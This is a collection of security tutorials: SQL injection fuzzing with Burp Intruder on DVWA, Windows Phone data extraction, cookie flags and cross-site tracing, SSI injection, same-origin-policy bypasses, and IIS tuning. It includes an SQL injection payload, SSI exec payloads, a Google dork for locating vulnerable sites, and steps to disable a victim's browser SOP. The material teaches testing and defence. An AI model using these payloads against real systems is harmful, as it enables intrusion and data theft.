1. Introduction This article introduces Burp Suite Intruder and shows how it can be used for SQL injection fuzzing. 2. Burp Suite Intruder It is a part of Burp Suite, which is an integrated platform for website security testing [1]. Burp Suite Intruder is helpful when fuzzing for vulnerabilities in web applications. Let’s assume that a penetration tester wants to find SQL injection vulnerabilities. First he needs to intercept the request with Burp Suite Proxy. Then the request is sent to Burp Suite Intruder. After that, the penetration tester needs to define the parameters that will be tested for SQL injection. The next step is defining the payloads and attack type (described later in the article). Then Burp Suite Intruder is launched. When fuzzing is finished, the penetration tester is expected to analyze the output to identify potential vulnerabilities. 3. Target DVWA (Damn Vulnerable Web Application) is a web application that is intentionally vulnerable [2]. One can use it to play with web application security stuff. Let’s attack the website in DVWA that is vulnerable to SQL injection. The user is asked to enter User ID. Then the first name and surname of the user are displayed. DVWA is a part of Metasploitable, which is an intentionally vulnerable Linux-based virtual machine [3]. It can be used to practice penetration testing skills. Please keep in mind that this machine is vulnerable and should not operate in bridge mode. 4. Request Interception, Payload Position, Attack Type Let’s set the security level to low (it can be changed using DVWA Security) in DVWA. Then enter User ID, click submit and intercept the request with Burp Suite Proxy. The next step is sending the request to Burp Suite Intruder (click right on the request and choose “Send to Intruder”). Then use the “Add” button in Burp Suite Intruder to choose the parameter that will be fuzzed (it is called payload position in Burp Suite Intruder). User ID is sent in parameter id. That’s why it is chosen as a payload position. As can be seen on the screenshot, sniper was chosen as an attack type. Then a single set of payloads is used and the payloads are taken one by one. It starts from the first position. When all payloads from the set are used, the same procedure is executed for the next payload position if it’s present. That’s why the number of requests generated is a product of the payloads in the set and payload positions. 5. Set of payloads A penetration tester can create his own list of payloads or use an existing one. Exemplary payloads can be found, for example, in Kali Linux (penetration testing distribution [4]) in the /usr/share/wfuzz/wordlist/Injections directory. Let’s use SQL.txt from this location to test the parameter id for SQL injection vulnerability. Then choose “Start attack” from the Burp Suite Intruder menu to start fuzzing. 6. Output analysis and exploitation Let’s see how the website responds to different payloads. As we can observe, the length of the response changes. It is 4699 bytes for baseline request (the one with id equal to 2) and 5005 bytes, when x’ or 1=1 or ‘x’=’y is the payload. It might suggest that more data was read from the database. Let’s check the response for this payload. As we can see, this payload can be used to extract first names and surnames of all users from the database. 7. Summary Burp Suite Intruder was introduced. It can be helpful when fuzzing for vulnerabilities in web applications. Exemplary payloads can be found, for example, in Kali Linux in /usr/share/wfuzz/wordlist/Injections directory. It was presented how to use Burp Suite Intruder for SQL injection fuzzing DOWNLOAD BURPSUITE Source
-
Abstract Abbreviated as WP, Windows Phone is a new Smartphone operating system developed by Microsoft in order to succeed the old Windows Mobile. This “new” operating system may potentially be the major mobile platform in next few years. Windows Phone is still a young proprietary mobile operating system, which can mean their digital forensics are still not very advanced. This article will take a look at Windows Phone 7 from a forensics perspective; we’ll see how to explore SMS, Facebook and Whatsapp messages, how to extract emails, contacts and pictures. I’ll show you the basics and extract as much information as I can from a Windows Phone. All tests will be done on an unlocked Nokia Lumia 710 running Windows Phone 7.5, but theoretically this should work with any with Windows Phone device. Introduction Windows Phone 7 has a security model based on the least privilege principle, a set of privileges that is given to a certain process starting from lowest access rights given to Windows Phone developer. Standard rights are given to a native application. In addition to that, every user application is running in a kind of sandbox – which means it runs in a restricted environment and isn’t allowed to directly access the operating system internals. Data acquisition approaches depend on the kind of the Smartphone we want to investigate (unlocked or not), and in general we need to install an application that will gain “root” privilege, grab data, then send it back to a connected computer. Technically this may bring some changes to the “original stat” of the Smartphone which may result in a small change of evidence. And even if we accept that, a full unlocked phone is needed to deploy an application on Windows Phone 7. Personally, I always opt for the “dirty” old school way. Always do it by hand! I’ll suppose that your Windows Phone is fully unlocked, that would be necessary for any investigation (as there’s a method which doesn’t work anymore to bypass the marketplace procedure for installing an application, like the use of ChevronWP7). I assume that you’re targeting a fully unlocked phone, and if so we can proceed by installing either “Windows Mobile Device Center,” which is still compatible with Windows Phone, or “Windows Phone Device Manager.” Technically those tools are aimed to implement an efficient business-data synchronization platform, and can be used to transfer all kinds of data between the connected device and your computer. Both Windows Mobile Device Center and Windows Phone Device Manager need Zune software 4.8 or later to be installed on the computer. In this article I’ll use both of those tools. Windows Phone Device Manager Installation Instructions Download Windows Phone Device Manager and launch WPDeviceManager.exe Plug in your phone, it should detect it automatically, if not click Connect in the menu The first time you connect your phone, Windows Phone Device Manager will automatically install TouchXperience Requirements An unlocked/registered Windows Phone 7.5 device Windows Vista/7/8 32-bit or 64-bit .NET Framework 4.0 Zune software 4.8 or later Zune WMDU (optional) Windows Phone SDK 7.1 All links for downloading the necessary files are in the reference section. Extracting data After connecting the phone to your computer and launching Zune, you can run Windows Phone Device Manager which will automatically install TouchXperience on your Windows Phone. The interfaces of both applications are quite user friendly and need no presentation. Use “Explore File and Folders” to navigate your Windows Phone files. The data acquisition methodology may differ depending on how we conceive it, you can just make a full copy of the connected mobile device and work on it or just investigate files directly from the phone. As you can probably guess, the Windows Phone file system is arranged the way a normal desktop Windows based file system is, just like Windows XP or Windows 7. It’s structured with the usual directories reachable from the root. The most important directories to investigate are: Application data, contains Internet Explorer, Outlook, Maps and all data related to installed applications on the phone Applications, contains the isolated storage for every application in addition to all applications installed by the user My Documents, contains some configuration files, Microsoft Office files, music and videos Windows, contains the core files of the operating system. In this paper I’ll talk neither about the registry nor about active tasks. Extracting SMS All SMSs are stored in one single file located in the directory “rootApplication DataMicrosoftOutlookStoresDeviceStore.” The file is “store.vol” and cannot be directly handled (you cannot copy or edit it) since it’s always in use by the operating system. The tip is to rename the file in a way that a copy of the original is instantly made by the operating system: Let’s see the content of this file using any text or hexadecimal editor. I always use a hexadecimal editor because it may make you aware of some details that you won’t see with normal text editor. The Vol file seems to be a Windows CE database and I didn’t have enough time to search for a desktop way to explore them. We’ll do it manually: You can see “Your Viber code is: 6895…” sent from “+44773602030.” All SMSs either sent or received start by “IPM.SMStext” can make it easy to find them which may automate the process of extracting them. Extracting Emails Since we’re talking about a Windows based operating system, it seems logical that a Windows Phone uses Outlook as its standard email client. That means that the user can synchronize it with the service they want, such as Yahoo Mail or Gmail. Outlook data is stored in ApplicationDataMicrosoftOutlookStoresDeviceStoredata, and its subdirectories. All these subdirectories are numbered, and each of them contain different data: We’ll focus on folder 3, 4, and 19 as for the other folders, I don’t know why they’re empty! All files contained in these subfolders are “.dat” files, but if you can deal with basic file craving, you can easily find that folder 3 and 19 contain JPEG files, and folder “14? contains HTML files. Let’s see how it works: I’ll open the first file with a hexadecimal editor and see how it looks: This file contains a valid JPEG file header, so let’s just rename the file to something.jpeg and see: This is one of my contacts’ photos and in addition to this now I know that the phone I’m investigating is “in principle” synchronized with LinkedIn too. So I can go this way as well and push my investigation in depth. Let’s now see what folder “4? has to tell us: This file contains HTML tags; renaming it to something.html will give us a working web page that you can easily open: Extracting Facebook data Every application on a Windows Phone has its own ID which will identify it on the marketplace, and as said earlier in this article, the folder “Applications” contains (between other things) all the applications installed on the phone. Each one is installed on a separate directory which has the unique application’s ID,under “Application/Data” directory: The unique Facebook Application ID is “82A23635-5BD9-DF11-A844-00237DE2DB9E” and after installation, the application creates many folders such as “Cookies”, “History” and “IsolatedStore.” These folders can contain a lot of useful information, especially “IsolatedStore”: DataCache.userID contains almost everything you need to know about the Facebook user with that ID. (In this case 14913XXXX is mine, and the one starting with 5472 is probably a friend who’s connected to Facebook using my phone.) This folder may contain the user’s friends with some details about them such as birthdays, links to their profile pictures, friend requests, incoming and outgoing messages, recent Facebook feeds, user’s notes and may even contain the last user’s location if the option was enabled… and ALL the data isn’t encrypted and can be easily parsed! An example of some of the latest user’s feeds: The user (me, Soufiane Tahiri) added a new photo that was shared with all friends, except restricted ones with a direct link to the image. All users’ friends are listed with their FULL names, birthdays and direct links to their respective Facebook profile pictures: Full Name: Abdelouahed XXXXX, birthday March 28, 1987 and the link to his profile picture. All messages sent or received, even spam, are listed (as seen below): The Images folder contains all the images viewed by the user on Facebook using this application. All you need to do is add “.jpeg” as an extension to the file name: The file userID.setting contains the user’s Facebook profile name, a link to that profile and a direct link to the user’s profile picture: I think I’m done with Facebook, just explore every single file and be sure that you’ll get more information than you ask for. Extracting Whatsapp data Just like any other application, all you need to know is the application ID to find where Whatsapp is installed, and Whatsapp application ID is 218A0EBB-1585-4C7E-A9EC-054CF4569A79. By navigating to ApplicationsData218A0EBB-1585-4C7E-A9EC-054CF4569A79Data, you can find two folders. PlatformData contains all the pictures captured and sent by the user and IsolatedStore contains almost everything you want to extract. The IsolatedStore of Whatsap is arranged like this: The Cphotos folder contains all current contact photos, all you have to do is to add “.jpeg” to their respective names. The profilePictures folder contains all previous photos used by all your contacts, a kind of profile pictures history, and all you have to do is add “.jpeg.” The Shared folder contains three subdirectories, but the most interesting one is “Transfers.” You can find every single file sent or received via Whatsapp. Even files you’ve deleted are still there. (I was quite surprised when I discovered that.) Then two interesting files display, “contacts.db”and “messages.db.” Obviously these are SQLite databases: They can easily be explored using any SQLite browser. What’s interesting about these files is that you can see every contact’s phone number, name and every single detail. Here’s the schema of the contacts.db file and some of its content: You can find all conversations via Whatsapp, stored clearly in the “messages.db” file. Actually this folder can be really interesting for investigation. Maybe I’ll write an article only about Whatsapp on Windows Phone, but to limit the size of this article I’ll not go further. In fact, by continually analyzing how things are done on a Windows Phone, I found that every installed application can be easily investigated, such as Tango, Viber, or LinkedIn. So every single message, email or file sent or received is just stored clearly, you just have to read it. This was just so intriguing to me and I decided to install the Paypal application and give it a try! Extracting PayPal data Once connected, the Paypal application stores everything you need to know about the Paypal owner in one single file called “__ApplicationSettings.” It can be found under “ApplicationsData75738196-1DB2-49D9-AFB1-D66A34D19FB6DataIsolatedStore.” It’s an XML file. The file contains the user’s full address, email address, phone number, recent transactions, currency used, payments received and transaction history. It’s really everything you need to know, all stored clearly: Extracting Maps data Maps data and user location data is in general storage in the “Application DataMaps” folder. “MapsDataSet.dat” contains the last known locations of the phone. (In my case I found last two addresses.) They were very accurate and given by address, not by GPS coordinates: Summary Analyzing a Windows Phone was very interesting since almost every single piece of data was cached or stored clearly, you can easily investigate Internet Explorer history, recently open tabs, every file exchange, every email attachment… Actually the only challenge was reaching the right of acceding data, since Windows Phone devices give limited access rights to the user. This limitation can be bypassed by many methods already available, tested and fully working. This article was just an initial test of my own phone and this process can be automated to get an even more in-depth analysis of any extracted file. Downloads Windows Phone Device Manager : TouchXperience - Mobile applications for Windows Phone & Windows Mobile Windows Mobile Device Center : Download Microsoft Windows Mobile Device Center 6.1 for Windows Vista (32-bit) from Official Microsoft Download Center Source
-
1. Introduction Securing cookies is an important subject. Think about an authentication cookie. When the attacker is able to grab this cookie, he can impersonate the user. This article describes HttpOnly and secure flags that can enhance security of cookies. 2. HTTP, HTTPS and secure Flag When HTTP protocol is used, the traffic is sent in plaintext. It allows the attacker to see/modify the traffic (man-in-the-middle attack). HTTPS is a secure version of HTTP – it uses SSL/TLS to protect the data of the application layer. When HTTPS is used, the following properties are achieved: authentication, data integrity, confidentiality. How are HTTP and HTTPS related to a secure flag of the cookie? Let’s consider the case of an authentication cookie. As was previously said, stealing this cookie is equivalent to impersonating the user. When HTTP is used, the cookie is sent in plaintext. This is fine for the attacker eavesdropping on the communication channel between the browser and the server – he can grab the cookie and impersonate the user. Now let’s assume that HTTPS is used instead of HTTP. HTTPS provides confidentiality. That’s why the attacker can’t see the cookie. The conclusion is to send the authentication cookie over a secure channel so that it can’t be eavesdropped. The question that might appear in this moment is: why do we need a secure flag if we can use HTTPS? Let’s consider the following scenario to answer this question. The site is available over HTTP and HTTPS. Moreover, let’s assume that there is an attacker in the middle of the communication channel between the browser and the server. The cookie sent over HTTPS can’t be eavesdropped. However, the attacker can take advantage of the fact that the site is also available over HTTP. The attacker can send the link to the HTTP version of the site to the user. The user clicks the link and the HTTP request is generated. Since HTTP traffic is sent in plaintext, the attacker eavesdrops on the communication channel and reads the authentication cookie of the user. Can we allow this cookie to be sent only over HTTPS? If this was possible, we would prevent the attacker from reading the authentication cookie in our story. It turns out that it is possible, and a secure flag is used exactly for this purpose – the cookie with a secure flag will only be sent over an HTTPS connection. 3. HttpOnly Flag In the previous section, it was presented how to protect the cookie from an attacker eavesdropping on the communication channel between the browser and the server. However, eavesdropping is not the only attack vector to grab the cookie. Let’s continue the story with the authentication cookie and assume that XSS (cross-site scripting) vulnerability is present in the application. Then the attacker can take advantage of the XSS vulnerability to steal the authentication cookie. Can we somehow prevent this from happening? It turns out that an HttpOnly flag can be used to solve this problem. When an HttpOnly flag is used, JavaScript will not be able to read this authentication cookie in case of XSS exploitation. It seems like we have achieved the goal, but the problem might still be present when cross-site tracing (XST) vulnerability exists (this vulnerability will be explained in the next section of the article) – the attacker might take advantage of XSS and enabled TRACE method to read the authentication cookie even if HttpOnly flag is used. Let’s see how XST works. 4. XST to bypass HttpOnly flag GET and POST are the most commonly used methods by HTTP. However, there are not the only ones. Among the others is HTTP TRACE method that can used for debugging purposes. When the TRACE request is sent to the server, it is echoed back to the browser (assuming that TRACE is enabled). It is important here, that the response includes the cookie sent in the request. Let’s continue the story of the authentication cookie from previous sections. The authentication cookie is sent in HTTP TRACE requests even if the HttpOnly flag is used. The attacker needs a way to send an HTTP TRACE request and then read the response. Here, XSS vulnerability can be helpful. Let’s assume that the application is vulnerable to XSS. Then the attacker can inject the script that sends the TRACE request. When the response comes, the script extracts the authentication cookie and sends it to the attacker. This way the attacker can grab the authentication cookie even if the HttpOnly flag is used. As we have seen, the HTTP TRACE method was combined with XSS to read the authentication cookie, even if the HttpOnly flag is used. The combination of HTTP TRACE method and XSS is called cross-site tracing (XST) attack. It turns out that modern browsers block the HTTP TRACE method in XMLHttpRequest. That’s why the attacker has to find another way to send an HTTP TRACE request. One may say that XST is quite historical and not worth mentioning. In my opinion, it’s good to know how XST works. If the attacker finds another way of sending HTTP TRACE, then he can bypass the HttpOnly flag when he knows how XST works. Moreover, the possibility/impossibility of sending an HTTP TRACE request is browser-dependent – it would just be better to disable HTTP TRACE and make XST impossible. Finally, XST is a nice example that shows how an attacker might use something that is considered to be harmless itself (enabled HTTP TRACE) to bypass some protection offered by the HttpOnly flag. It reminds us that details are very important in security, and the attacker can connect different pieces to make the attack work. 5. Summary Security of cookies is an important subject. HttpOnly and secure flags can be used to make the cookies more secure. When a secure flag is used, then the cookie will only be sent over HTTPS, which is HTTP over SSL/TLS. When this is the case, the attacker eavesdropping on the communication channel from the browser to the server will not be able to read the cookie (HTTPS provides authentication, data integrity and confidentiality). When HttpOnly flag is used, JavaScript will not be able to read the cookie in case of XSS exploitation. It was also presented how the combination of HTTP TRACE method and XSS might be used to bypass HttpOnly flag – this combination is cross-site tracing (XST) attack. It turns out that modern browsers block the HTTP TRACE method in XMLHttpRequest. However, it’s still important to know how XST works. If the attacker finds another way of sending HTTP TRACE, then he can bypass an HttpOnly flag when he understands how XST works. Source
-
Injection is a high-category vulnerability in web applications. Attackers and security auditors alike always try to find the kind of vulnerabilities which allow them to perform a command execution. There are a number of vulnerabilities in the category of command execution, and one of them is Server Side Includes (SSI) Injection. So, this article is completely based on SSI Injection and for is noobs. What is Server Side Includes? Server side includes is highly useful feature for web applications. This feature helps you to add dynamically generated content to an existing page without updating the whole page. Suppose you need to update a small part of a web page almost every minute, without updating the whole page. So, this feature must be supported from the web server and enabled as well. SSI Injection We are going to exploit this functionality by injecting our mean code. First, it’s a server side exploit because an attacker sends some malicious code into a Web application which is executed by the Web server. An SSI injection attack exploits a web application by using arbitrary codes remotely. Use the below command to check whether the site is vulnerable to SSI injection or not: <!–#echo var=”DATE_LOCAL” –> The above command returns the current date and time. Next, find sites which are vulnerable to SSI injection. For this, Google dorks will always be a better option: Inurl:bin/cklb There are number of results (sites) provide by Google. Open the sites and inject into the input fields such as search, login/password, etc. Please note that this is totally illegal to do without permission of the website owner. So, I am use vulnerable labs to perform this attack. Below is a picture of two input fields: The above two fields are a functionality of IP lookup. Enter your name and press the Lookup button, but instead of name, enter some server side include scripts which are shown in the further response to your page. Above I enter ” <!–#echo var=”DATE_LOCAL” –> ” script in the first field to check whether the site is vulnerable to SSI injection or not, and in the second field I enter whatever I wish. I run bWAPP vulnerable web application to demonstrate this problem. Above the SSI script runs and responds with current date and time. For further exploitation, I show only commands, not POC for that. After the above observation, the next script is to check whether command execution is possible or not. If you want to check the current user on the server, use this <!–#exec cmd==”whoami” –>. It shows the details of the user running on the server. The next step is to upload a web shell. I used a Linux-based vulnerable app to perform this attack and it’s helpful to understand this concept. Conclusion Nowadays every Web server has a default configuration that allows SSI but not the exec feature. Upgrade the Web server or make sure your server is properly configured. References: https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection https://www.owasp.org/index.php/Testing_for_SSI_Injection_(OWASP-DV-009) Source
-
We all know that by using JavaScript you can do many things, for example read elements on a page, analyze the DOM, etc. Now assume that you logged into facebook.com and in another browser tab visited mysite.com. The question is can a script present in mysite.com access the elements on the page loaded by facebook.com? The answer is a big NO. Imagine the chaos it would cause if the answer was yes! But the scripts loaded by facebook.com can happily access the page elements. So how does the browser decide which script can access which page? This is where Same Origin Policy comes in! SOP is one of the most important security concepts that govern how the modern web browsers work. This article explores SOP, including SOP rules and some techniques to bypass SOP. So what is Same Origin Policy? Same Origin Policy permits scripts running on pages originating from the ‘same site’ or ‘same origin’ to access each other’s DOM with no specific restrictions, but prevents access to the DOM on different sites. So the how does browser identify whether the script and the page are from ‘same origin’ or not? The origin is calculated based on the combination of scheme, host and port. For example, the scheme, host and port for https://www.facebook.com:8080/ are calculated as below: Scheme: https || Host: facebook || Port: 8080 Browsers consider two resources to be of the same origin if and only if all these values are exactly the same. For example https://www.facebook.com:8080/ and https://www.carrers.facebook.com:8080/ are not the same origin because the host is different. Note: IE browser has two exceptions while checking for same origin: IE doesn’t include port while calculating ‘origin’ Same origin policy is not applied for sites which are under the highly trusted zone. Also note that SOP is not just limited to JavaScript. It also applies for XMLHttpRequest, cookies, Flash, etc. We will see more about this in the below sections. Exceptions to SOP and their risks SOP poses significant problems to large websites which use multiple domains (due to the differences in the hostnames). Hence there are some exceptions which can be used to relax it. Scripts that set domain to the same value You can use JavaScript to set the value of document.domain property. If two pages contain scripts which set the domain to the same value, the SOP is relaxed for these two windows, and each window can interact with the other. For example, consider the earlier scenario where a script present on https://www.carrers.facebook.com/ cannot access the DOM of a page loaded by https://www.facebook.com/. Now if this script (present on https://www.carrers.facebook.com/) sets its document.domain to www.facebook.com then the script can happily access the DOM. Also note that a script cannot set the value of document.domain to any hostname. It can set the value only to a suffix of the current domain. Risk: This is relatively safe because we are only talking about sub domains of a site. So the scope for someone exploiting this is relatively low, unless the sub domain is compromised. CORS [Cross Origin Resource Sharing] CORS is a HTML5 feature that allows one site to access another site’s resources even if both are of different domains. Hence with CORS, JavaScript on a webpage can initiate an AJAX request to another site. To allow this process, the server which implements CORS adds an HTTP header named ‘Access-Control-Allow-Origin: www.xyz.com’ in the response. Now xyz.com, even though is not of same origin, can access this server’s pages. Risk: Developers often tend to use ‘*’ to get things working. CORS, being a relatively new concept, is often misunderstood. If a site sets Access-Control-Allow-Origin:* it means an attacker can initiate an AJAX request to this site with his JavaScript and can access the resources. Hence, while security testing an HTML5 site which has CORS enabled, look for Access-Control-Allow-Origin header to check if it allows only the allowed sites. CDM [Cross Document Messaging] CDM or Cross Document Messaging is also one of the features introduced in HTML 5. This feature allows documents to communicate with one another across different domains. For example, Document A present on www.abc.com can communicate with document X present on www.xyz.com (assume it’s present as an iframe) by issuing the below request from JavaScript: var c = document.getElementsByTagName('iframe')[0]; c.contentWindow.postMessage('Hiee', 'http://www.xyz.com/'); Upon receiving this request, the script present on www.xyz.com can respond back using the event listener. function receiver(event) { if (event.origin == 'http://www.abc.com') { if (event.data == 'Hiee') { event.source.postMessage('how are you?', event.origin); } else { alert(event.data); } } } Risk: If the origin checking of the sender site is not done properly, there is a chance to run malicious code from other domains. It is also recommended to check the format of the incoming data to make sure that it is in the expected format. JSONP Repeating the golden rule – You cannot make a cross-domain Ajax request to update a current page. Here it is important to note that SOP does not restrict a site from loading JavaScript files from a different domain. With JSOP, by adding a <script> element to the page, you can load a JSON response from different domain. Because the code is loaded by the <script> tag, it can be normally executed. The below figure sums up everything! Risk: Suppose a page hosted on abc.com uses JSONP to access services provided by xyz.com, then the site abc.com has to completely trust xyz.com. From a security perspective, excessive trust on other sites is never good. If xyz.com is malicious, it can run malicious code on the page loaded by abc.com. Also a malicious page can request and obtain JSON data of another site by using the <script> tag and hence can be used to launch CSRF attacks. Getting Around SOP There are ways to turn off same origin policy in browsers. This can be exploited by attackers during targeted attacks on certain individuals. If an attacker can have physical access to the target system, he can turn off the SOP in that browser and can then launch his attack later to steal certain information from the websites browsed by the user. Below are the options to turn off SOP in different browsers. Internet Explorer: • Go to the Security tab. For the current zone click the ‘Custom level’ button. • In the next window, look for ‘Miscellaneous > Access data sources across domains’ and set it to “Disable”. Mozilla: • Open the Mozilla browser and enter ‘about:config’ • Search for security.fileuri.strict_origin_policy and change the value to false by double clicking it, as shown below. Google Chrome: • Start the chrome by passing the below argument: C:Program FilesChromeChrome.exe –disable-web-security Safari: • Start the Safari by passing the below argument: C:Program FilesSafariSafari.exe –disable-web-security Source
-
Writing optimized website code is considered to be one the most complicated tasks. Hence, this paper explores amazing server side configuration techniques and various improvements to boost-up your ASP.NET website’s performance through the Internet Information Web Server. Dot NET websites goes live to the internet via IIS web server and typically manipulates a huge size of code and display large number of images and other graphics, which obviously worsen the page retrieval time from the server and degrade the overall performance of a website. So, it is important to configure some of parameters of IIS, ]which serves an optimized web page to users and effectively increases the overall performance of a website. HTTP Page Headers Every web page contains some extra information in the form of an HTTP header which is sent to the server and used to inform the visitor’s web browser of how to handle the web page. An HTTP header assists to increase the performance of a web page through HTTP Keep-Alives and Content Expiration. The HTTP Keep-Alives setting is required for a connection-base authentication such as IWA and the browser makes numerous connection requests for a web page in its absence, and the website become less responsive and slower because the browser makes multiple requests in order to download an entire page which contains multiple elements. However, the HTTP Keep-Alives setting keeps the connection open for multiple requests. On the other hand, we can reduce second-access load time at a moderate percentage level through Content Expiration, which determines whether or not to return a new version of a response to the request page if the request is made after the web page content has terminated. We can configure this property to every site through IIS as follows: The HTTP header X-Powered-By ASP.NET is not required by the browser and should be removed because they are potentially exploitable and website bandwidth usage is optimized to a small extent. Deletion of this header removes unsolicited HTTP response headers from the header contents. Although we can delete them through URLRewriting and URLScan methods, IIS can take care of them as follows: We can also configure this setting by changing the web.config file directly on the visual studio side, by making the enableVersionHeader property as false as follows: <system.web> <httpRuntime enableVersionHeader="false" /> </system.web> HTTP Compression The HTTP compression method requires support of HTTP 1.1 by the client browser. In it, a website consumes less bandwidth and the page becomes more responsive because it compresses data before the web server sends it and the browser decompresses the data before rendering it. This feature can be enabled in IIS through Windows Features as follows: IIS Manager allows DEFLATE and GNU zip compression schemes to compress application responses for both dynamic application and static files. It is beneficial in terms of increasing page response, improving bandwidth utilization, and reducing server extension. We can enable HTTP compression in the IIS web server as follows. Here, we can decide the compression method along with other configuration rules, such as cache directory and file size limit. Output Caching Output caching makes web pages tremendously responsive during the round-trip to the server. When a user requests a particular page, the web server returns it to the client browser and stores a copy of that processed web page in the memory on the web server and returns it to the client in subsequent requests for that same content, which eliminates the need to reprocess that page in the future. But the cached contents are discarded if resources run low on the web server. Hence, the page will then be re-processed or re-cached at the time of the next request for that content. We can configure the cache size limit and maximum cached response size through IIS manager, as mentioned in the aforesaid image. Website Connection It is usually spotted that users have no activity after opening any website and keep it open for an indefinite time period, which consumes resource of the web server because the IIS spends computing resources to keep this connection alive. It is recommended to set a limit for opened web pages or keeping it low as possible, in order to save computing resources and better performance. We can set the connection time-out for a website through IIS manager as follows: ASP.NET Debugging A website typically runs in debugging mode while in development, in order to do proper testing of business logic and other diagnostics, but unfortunately if the programmer forgets to turn off this configuration during deployment on the production server, it consumes abundant processing power and eventually degrades the performance. Debugging is disabled by default, and debugging is repeatedly enabled to troubleshoot a problem. The ASP.NET applications compile with extra information in debugging mode that enables a debugger to closely regulate and supervise the execution of a website. However, the performance of the application is affected. Deploying a website in enabled Debug mode is dangerous and considered to be a huge vulnerability because hackers can obtain inside information about the application for that, and they shouldn’t have access indeed. We can configure this setting via the IIS manager as follows We can also alter this setting from web.config file by changing to false as follows: <system.web> <compilation debug="false" explicit="true" strict="false" targetFramework="4.0" /> </system.web> Bandwidth Adjusting Bandwidth must be managed properly for a website in case of allotting a minimum amount of bandwidth to a particular website it it requires larger, and on the other hand, a website using too much bandwidth is given shorter. Both scenarios would definitely affect the website performance. We can limit the total bandwidth for a website through the IIS manager which is disabled by default and the recommend setting indeed. Application Pool Limits A website can be divided into groups of one or more URLs that are served by a worker process. These pools create complete sandbox isolation between the other application pools in which they are contained, offering security and performance benefits and cannot affect the applications in the application pool. Each application pool runs its own worker process within the operating system, so there is complete isolation between pools. The w3wp.exe worker process runs in user mode and processes requests such as dynamic or static contents for each application pool. Here, we can configure the application pool for a web server as: When an application pool is recycled, the existing worker process is not immediately killed and instead, a second process is in progress, and once it is ready, Http.sys will send all new requests to the new worker process. Once the old worker process has finalized all requests, it will shut down. So, we can stop this from happening by setting Disable Overlapped Recycle to false. Now the existing process will shut down and then a new one will be started. We can do this configuration from Advanced Settings as follows: Unoccupied Modules Websites deployed in IIS typically are occupied with some in-built modules such as profile and passportauthentication, which loads on each round trip to server. Some of them are associated with that particular website in order to enable corresponding functionality and the rest are useless, which creates an extra CPU overhead because they also load with each page request to server. We can have a look at the entire in-built modules through the IIS manager: We can either remove unoccupied modules via the IIS manager as illustrated in the aforesaid figure or through the web.config file in the project solution as follows: <system.webServer> <modules> <remove name="Profile" /> </modules> </system.webServer> Summary Although performance issues among websites are deemed to be complicated and programmers have been striving to achieve a fast responsive website through employing sophisticated algorithms, here we are achieving this not by writing code, but by making some configurations in the IIS web server. We have come to an understanding about performance internals of an ASP.NET website. In fact, we have touched the most crucial segment which is responsible for making a website good or bad in terms of performance. This article illustrates various IIS configurations of ASP.NET websites through the IIS web server, in order to make them faster and responsive. Source